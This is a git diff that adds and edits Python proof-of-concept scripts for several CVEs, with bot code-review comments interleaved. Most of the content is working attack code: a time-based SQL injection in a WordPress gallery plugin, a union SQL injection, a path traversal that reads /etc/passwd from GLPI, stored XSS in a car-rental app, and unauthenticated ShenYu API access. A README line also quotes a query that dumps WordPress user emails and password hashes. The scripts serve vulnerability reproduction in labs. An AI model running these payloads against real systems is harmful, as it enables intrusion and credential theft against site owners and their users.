diff --git a/2016/CVE-2016-10940/poc/pocsploit/CVE-2016-10940.py b/2016/CVE-2016-10940/poc/pocsploit/CVE-2016-10940.py
index b57b70aaa..c8a05ab62 100644
--- a/2016/CVE-2016-10940/poc/pocsploit/CVE-2016-10940.py
+++ b/2016/CVE-2016-10940/poc/pocsploit/CVE-2016-10940.py
@@ -1,5 +1,5 @@
import requests
-
+import time
# Vuln Base Info
def info():
@@ -29,7 +29,20 @@ def info():
# Vender Fingerprint
def fingerprint(url):
- return True
+ username = "admin"
+ password = "admin"
+ s = requests.Session()
+ path = """/wp-login.php"""
+ method = "POST"
+ data = """log={username}&pwd={password}&wp-submit=Log+In&testcookie=1""".format(username=username, password=password)
+ headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
+ resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+
+ resp1 = s.get(url+"/wp-admin/admin.php?page=zm_gallery")
+ if "ZM Gallery Plugin" in resp1.text:
+ return True
+ else:
+ return False
# Proof of Concept
def poc(url):
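Review bot: The second request in the new fingerprint() body, `resp1 = s.get(url+"/wp-admin/admin.php?page=zm_gallery")`, is sent without `timeout`, `verify` or `allow_redirects`, unlike the login request two lines above it, so a non-responding host can block the scanner indefinitely; it should read `resp1 = s.get(url+"/wp-admin/admin.php?page=zm_gallery", timeout=10, verify=False, allow_redirects=False)`. Neither request is wrapped in a try/except the way poc() is, so a connection error or timeout propagates out of fingerprint() instead of yielding False; wrapping both in `try: ... except requests.RequestException: return False` keeps the two entry points consistent. `resp0` is assigned and never read. The credentials are spliced into the form body with str.format, so any `&`, `=` or `%` in the value corrupts the request; building the body with `urllib.parse.urlencode({"log": username, "pwd": password, "wp-submit": "Log In", "testcookie": "1"})` avoids that, and the same pattern appears in the CVE-2021-24750 hunk (line 92) and the CVE-2021-46005 hunk (line 271). The trailing if/else collapses to `return "ZM Gallery Plugin" in resp1.text`.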
@@ -47,19 +60,15 @@ def poc(url):
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
- path = """/wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc"""
+ path = """/wp-admin/admin.php?page=zm_gallery&orderby=1%20AND%20(SELECT%204291%20FROM%20(SELECT(SLEEP(3)))cxXu)&order=desc"""
method = "GET"
data = """"""
headers = {}
+ time1 = time.time()
resp1 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ time2 = time.time()
- path = """/wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc"""
- method = "GET"
- data = """"""
- headers = {}
- resp2 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
-
- if "
" in resp1.text and " | " not in resp2.text:
+ if "ZM Gallery Plugin" in resp1.text and 3 <= (time2-time1) < 10:
result["success"] = True
result["info"] = info()
result["payload"] = url+path
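Review bot: The elapsed time is taken from `time.time()`, a wall clock that can step backwards or forwards under NTP adjustment, so the interval `time2-time1` is not guaranteed to be meaningful; `time1 = time.monotonic()` and `time2 = time.monotonic()` are the correct calls for measuring a duration. The window `3 <= (time2-time1) < 10` measures the whole round trip, including network and server latency, so a slow but unaffected target can land inside it and be reported as vulnerable; a comment such as `# Timing window includes network latency; a single sample can false-positive on slow hosts` would document that limitation for whoever reads the result. `data = """"""` and `headers = {}` are built only to be passed to a GET, and `resp0` from the login request is never read. The body of poc() starts and ends outside this hunk.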
diff --git a/2016/CVE-2016-10940/vultarget/1.png b/2016/CVE-2016-10940/vultarget/1.png
index eb621f05e..c291a020c 100644
Binary files a/2016/CVE-2016-10940/vultarget/1.png and b/2016/CVE-2016-10940/vultarget/1.png differ
diff --git a/2016/CVE-2016-10940/vultarget/README.md b/2016/CVE-2016-10940/vultarget/README.md
index 0bee32964..775b26b87 100644
--- a/2016/CVE-2016-10940/vultarget/README.md
+++ b/2016/CVE-2016-10940/vultarget/README.md
@@ -15,6 +15,6 @@ Username/Password: wordpress/wordpress
## Poc
-[poc](poc/nuclei/CVE-2016-10940.yaml)
+[poc](../poc/pocsploit/CVE-2016-10940.py)
![](1.png)
diff --git a/2021/CVE-2021-24750/poc/pocsploit/CVE-2021-24750.py b/2021/CVE-2021-24750/poc/pocsploit/CVE-2021-24750.py
index 29d2434ca..2fe9e63e5 100644
--- a/2021/CVE-2021-24750/poc/pocsploit/CVE-2021-24750.py
+++ b/2021/CVE-2021-24750/poc/pocsploit/CVE-2021-24750.py
@@ -19,8 +19,7 @@ def info():
"cwe-id": "CWE-89"
},
"metadata":{
- "vuln-target": "",
-
+ "vuln-target": "https://github.com/cckuailong/reapoc/tree/main/2021/CVE-2021-24750/vultarget"
},
"tags": ["cve", "cve2021", "sqli", "wp", "wordpress", "wp-plugin", "authenticated"],
}
@@ -33,6 +32,8 @@ def fingerprint(url):
# Proof of Concept
def poc(url):
result = {}
+ username = "admin"
+ password = "admin"
try:
url = format_url(url)
@@ -40,15 +41,14 @@ def poc(url):
path = """/wp-login.php"""
method = "POST"
- data = """log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1"""
+ data = """log={username}&pwd={password}&wp-submit=Log+In&testcookie=1""".format(username=username, password=password)
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
- resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False)
- path = """/wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5('CVE-2021-24750'),4--%20%22%7D"""
- method = "CVE-2021-24750'),4--%20%22%7D"
- data = """"""
+ path = "/wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5('CVE-2021-24750'),4--%20%22%7D"
+ method = "GET"
headers = {}
- resp1 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp1 = s.request(method=method,url=url+path,headers=headers,timeout=10,verify=False)
if ("""266f89556d2b38ff067b580fb305c522""" in resp1.text) and (resp1.status_code == 200):
result["success"] = True
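Review bot: `resp0` on the new `s.request(...)` login line is assigned and never read, so a failed login is indistinguishable from a non-vulnerable target: the script silently proceeds to the second request and reports no success. Either drop the binding and call `s.request(...)` for its cookie side effect, or inspect the login response before continuing and record the distinct outcome in `result`. The `result = {}` initialisation sits in the previous hunk and the except clause lies outside this one, so whether a non-vulnerable target returns a dict with a "success" key cannot be confirmed from here; if it does not, callers indexing `result["success"]` would raise KeyError.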
diff --git a/2021/CVE-2021-24750/vultarget/1.png b/2021/CVE-2021-24750/vultarget/1.png
new file mode 100644
index 000000000..0f126c960
Binary files /dev/null and b/2021/CVE-2021-24750/vultarget/1.png differ
diff --git a/2021/CVE-2021-24750/vultarget/README.md b/2021/CVE-2021-24750/vultarget/README.md
index 9cf589ff6..67cddd580 100644
--- a/2021/CVE-2021-24750/vultarget/README.md
+++ b/2021/CVE-2021-24750/vultarget/README.md
@@ -10,4 +10,10 @@ docker-compose run --rm wp-cli install-wp
* Start the exploit script with an sql query that gets users emails and passwords
```
python3 exploit.py -C 'union select 1,1,user_email,user_pass from wp_users -- '
-```
\ No newline at end of file
+```
+
+## Poc
+
+![](1.png)
+
+[Poc](../poc/pocsploit/CVE-2021-24750.py)
\ No newline at end of file
diff --git a/2021/CVE-2021-43778/poc/pocsploit/CVE-2021-43778.py b/2021/CVE-2021-43778/poc/pocsploit/CVE-2021-43778.py
new file mode 100644
index 000000000..a003877da
--- /dev/null
+++ b/2021/CVE-2021-43778/poc/pocsploit/CVE-2021-43778.py
@@ -0,0 +1,70 @@
+import requests
+
+
+# Vuln Base Info
+def info():
+ return {
+ "author": "cckuailong",
+ "name": '''GLPI plugin Barcode < 2.6.1 path traversal vulnerability''',
+ "description": '''Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability. This issue was patched in version 2.6.1. As a workaround, delete the `front/send.php` file.''',
+ "severity": "critical",
+ "references": [
+ "https://github.com/AK-blank/CVE-2021-43778",
+ "https://nvd.nist.gov/vuln/detail/CVE-2021-43778"
+ ],
+ "classification": {
+ "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
+ "cvss-score": "9.1",
+ "cve-id": "CVE-2021-43778",
+ "cwe-id": "CWE-22"
+ },
+ "metadata":{
+ "vuln-target": "https://github.com/cckuailong/reapoc/tree/main/2021/CVE-2021-43778/vultarget"
+ },
+ "tags": ["glpi", "cve", "cve2021", "lfi"],
+ }
+
+
+# Vender Fingerprint
+def fingerprint(url):
+ resp = requests.get(url+"/glpi/", timeout=10, verify=False, allow_redirects=False)
+ if "GLPI - " in resp.text and "/pics/login_logo_glpi.png" in resp.text:
+ return True
+ else:
+ return False
+
+# Proof of Concept
+def poc(url):
+ result = {}
+ try:
+ url = format_url(url)
+
+ path = "/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd"
+ method = "GET"
+ headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36"}
+ resp = requests.request(method=method,url=url+path,headers=headers,timeout=10,verify=False,allow_redirects=False)
+
+ if "root:" in resp.text and ":0:0" in resp.text and resp.status_code == 200:
+ result["success"] = True
+ result["info"] = info()
+ result["payload"] = url+path
+
+ except:
+ result["success"] = False
+
+ return result
+
+
+# Exploit, can be same with poc()
+def exp(url):
+ return poc(url)
+
+
+# Utils
+def format_url(url):
+ url = url.strip()
+ if not ( url.startswith('http://') or url.startswith('https://') ):
+ url = 'http://' + url
+ url = url.rstrip('/')
+
+ return url
\ No newline at end of file
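Review bot: poc() returns `{}` whenever the target answers but the markers are not found, because `result["success"]` is only assigned on the success path or inside the except clause, so a caller doing `result["success"]` on a clean target gets a KeyError; initialising with `result = {"success": False}` makes the return shape uniform. The bare `except:` also swallows KeyboardInterrupt and SystemExit and hides programming errors; `except requests.RequestException:` is the failure this branch is meant to absorb. The same two issues appear in the new CVE-2022-23944 file (hunk ending at line 375). fingerprint() has no error handling at all, so a connection error raises out of it rather than returning False. `verify=False` on every request disables certificate validation and emits an InsecureRequestWarning per call; a one-line comment noting this is intentional for lab targets would stop the next maintainer from treating it as an oversight.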
diff --git a/2021/CVE-2021-43778/poc/pocsploit/wait_to_be_added b/2021/CVE-2021-43778/poc/pocsploit/wait_to_be_added
deleted file mode 100644
index 08b178987..000000000
--- a/2021/CVE-2021-43778/poc/pocsploit/wait_to_be_added
+++ /dev/null
@@ -1 +0,0 @@
-Please contibute to implement this poc / vultarget, thanks!
diff --git a/2021/CVE-2021-43778/vultarget/README.md b/2021/CVE-2021-43778/vultarget/README.md
new file mode 100644
index 000000000..988dcd944
--- /dev/null
+++ b/2021/CVE-2021-43778/vultarget/README.md
@@ -0,0 +1,7 @@
+## Install the glpi
+
+## Copy the vuln plugin to DIR plugins/
+
+## Poc
+
+[Poc](../poc/pocsploit/CVE-2021-43778.py)
\ No newline at end of file
diff --git a/2021/CVE-2021-43778/vultarget/glpi-barcode-2.6.0.tar.bz2 b/2021/CVE-2021-43778/vultarget/glpi-barcode-2.6.0.tar.bz2
new file mode 100644
index 000000000..b92bb161d
Binary files /dev/null and b/2021/CVE-2021-43778/vultarget/glpi-barcode-2.6.0.tar.bz2 differ
diff --git a/2021/CVE-2021-43778/vultarget/wait_to_be_added b/2021/CVE-2021-43778/vultarget/wait_to_be_added
deleted file mode 100644
index ff27e85b6..000000000
--- a/2021/CVE-2021-43778/vultarget/wait_to_be_added
+++ /dev/null
@@ -1 +0,0 @@
-Please contibute to implement this vultarget, thanks!
diff --git a/2021/CVE-2021-46005/poc/pocsploit/CVE-2021-46005.py b/2021/CVE-2021-46005/poc/pocsploit/CVE-2021-46005.py
index a221f567d..59655cac6 100644
--- a/2021/CVE-2021-46005/poc/pocsploit/CVE-2021-46005.py
+++ b/2021/CVE-2021-46005/poc/pocsploit/CVE-2021-46005.py
@@ -19,8 +19,7 @@ def info():
"cwe-id": "CWE-79"
},
"metadata":{
- "vuln-target": "",
-
+ "vuln-target": "https://github.com/cckuailong/reapoc/tree/main/2021/CVE-2021-46005/vultarget"
},
"tags": ["cve", "cve2021", "xss", "sourcecodester", "authenticated"],
}
@@ -28,11 +27,17 @@ def info():
# Vender Fingerprint
def fingerprint(url):
- return True
+ resp = requests.get(url, timeout=10, verify=False)
+ if "Car Rental Portal" in resp.text:
+ return True
+ else:
+ return False
# Proof of Concept
def poc(url):
result = {}
+ username = "admin"
+ password = "admin"
try:
url = format_url(url)
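Review bot: The new fingerprint() issues `requests.get(url, timeout=10, verify=False)` with no try/except, so a refused connection or timeout propagates to the caller instead of producing False, while poc() below wraps its requests; `try: ... except requests.RequestException: return False` would make the two consistent. The if/else tail collapses to `return "Car Rental Portal" in resp.text`. The hardcoded `username`/`password` locals added to poc() are formatted into the body in the next hunk without URL-encoding, so values containing `&` or `=` would corrupt the form. poc() continues past this hunk.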
@@ -40,10 +45,9 @@ def poc(url):
path = """/admin/"""
method = "POST"
- data = """username={{username}}&password={{password}}&login="""
+ data = """username={username}&password={password}&login=""".format(username=username, password=password)
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Connection': 'close'}
- resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
-
+ resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False)
path = """/admin/post-avehical.php"""
method = "POST"
data = """------WebKitFormBoundarypWqYipqU21aYgccv
diff --git a/2021/CVE-2021-46005/vultarget/1.png b/2021/CVE-2021-46005/vultarget/1.png
new file mode 100644
index 000000000..12d6f4ee7
Binary files /dev/null and b/2021/CVE-2021-46005/vultarget/1.png differ
diff --git a/2021/CVE-2021-46005/vultarget/OnlineCarRental/admin/img/vehicleimages/test.png b/2021/CVE-2021-46005/vultarget/OnlineCarRental/admin/img/vehicleimages/test.png
new file mode 100644
index 000000000..e69de29bb
diff --git a/2021/CVE-2021-46005/vultarget/README.md b/2021/CVE-2021-46005/vultarget/README.md
index accaba401..dbe8645a6 100644
--- a/2021/CVE-2021-46005/vultarget/README.md
+++ b/2021/CVE-2021-46005/vultarget/README.md
@@ -123,3 +123,9 @@ Content-Disposition: form-data; name="submit"
4. Open the http://localhost/car-rental/ and our Payload excuted.
![](images/4.png)
+
+## Poc
+
+[Poc](../poc/pocsploit/CVE-2021-46005.py)
+
+![](1.png)
diff --git a/2022/CVE-2022-23944/poc/pocsploit/CVE-2022-23944.py b/2022/CVE-2022-23944/poc/pocsploit/CVE-2022-23944.py
new file mode 100644
index 000000000..f0bcc70ad
--- /dev/null
+++ b/2022/CVE-2022-23944/poc/pocsploit/CVE-2022-23944.py
@@ -0,0 +1,70 @@
+import requests
+
+
+# Vuln Base Info
+def info():
+ return {
+ "author": "cckuailong",
+ "name": '''ShenYu Admin Unauth Access''',
+ "description": '''User can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1.''',
+ "severity": "medium",
+ "references": [
+ "https://github.com/apache/incubator-shenyu/pull/2462/files",
+ "https://nvd.nist.gov/vuln/detail/CVE-2022-23944"
+ ],
+ "classification": {
+ "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
+ "cvss-score": "9.1",
+ "cve-id": "CVE-2022-23944",
+ "cwe-id": "CWE-306, CWE-862"
+ },
+ "metadata":{
+ "vuln-target": "https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-23944/vultarget"
+ },
+ "tags": ["shenyu", "unauth" , "apache"],
+ }
+
+
+# Vender Fingerprint
+def fingerprint(url):
+ resp = requests.get(url, timeout=10, verify=False)
+ if "ShenYu Gateway" in resp.text:
+ return True
+ else:
+ return False
+
+# Proof of Concept
+def poc(url):
+ result = {}
+ try:
+ url = format_url(url)
+
+ path = "/plugin"
+ method = "GET"
+ headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36"}
+ resp = requests.request(method=method,url=url+path,headers=headers,timeout=10,verify=False,allow_redirects=False)
+
+ if resp.status_code == 200 and '"message":"query success"' in resp.text and '"code":200' in resp.text:
+ result["success"] = True
+ result["info"] = info()
+ result["payload"] = url+path
+
+ except:
+ result["success"] = False
+
+ return result
+
+
+# Exploit, can be same with poc()
+def exp(url):
+ return poc(url)
+
+
+# Utils
+def format_url(url):
+ url = url.strip()
+ if not ( url.startswith('http://') or url.startswith('https://') ):
+ url = 'http://' + url
+ url = url.rstrip('/')
+
+ return url
\ No newline at end of file
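Review bot: The info() dict is internally inconsistent: `"severity": "medium"` sits next to `"cvss-score": "9.1"` and a vector with C:H/I:H, and a 9.1 base score maps to Critical, so one of the two fields is wrong and downstream tooling that filters on severity will misclassify this entry. fingerprint() looks for "ShenYu Gateway" while the PoC targets the Admin `/plugin` endpoint; it is not clear from this file that the admin UI serves that string, so that check should be confirmed against the vultarget. As in the other new PoC file, poc() returns `{}` on a non-vulnerable target and uses a bare `except:`; `result = {"success": False}` and `except requests.RequestException:` fix both. fingerprint() also has no error handling, so a connection failure raises rather than returning False.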
diff --git a/2022/CVE-2022-23944/poc/pocsploit/wait_to_be_added b/2022/CVE-2022-23944/poc/pocsploit/wait_to_be_added
deleted file mode 100644
index 08b178987..000000000
--- a/2022/CVE-2022-23944/poc/pocsploit/wait_to_be_added
+++ /dev/null
@@ -1 +0,0 @@
-Please contibute to implement this poc / vultarget, thanks!
diff --git a/2022/CVE-2022-23944/vultarget/3.png b/2022/CVE-2022-23944/vultarget/3.png
new file mode 100644
index 000000000..8b9d050e7
Binary files /dev/null and b/2022/CVE-2022-23944/vultarget/3.png differ
diff --git a/2022/CVE-2022-23944/vultarget/README.md b/2022/CVE-2022-23944/vultarget/README.md
index d245dfacf..bd7973eaa 100644
--- a/2022/CVE-2022-23944/vultarget/README.md
+++ b/2022/CVE-2022-23944/vultarget/README.md
@@ -17,3 +17,7 @@ vuln app:
version >= 4.2, return 600
![](2.png)
+
+[Poc](../poc/pocsploit/CVE-2022-23944.py)
+
+![](3.png)
\ No newline at end of file
|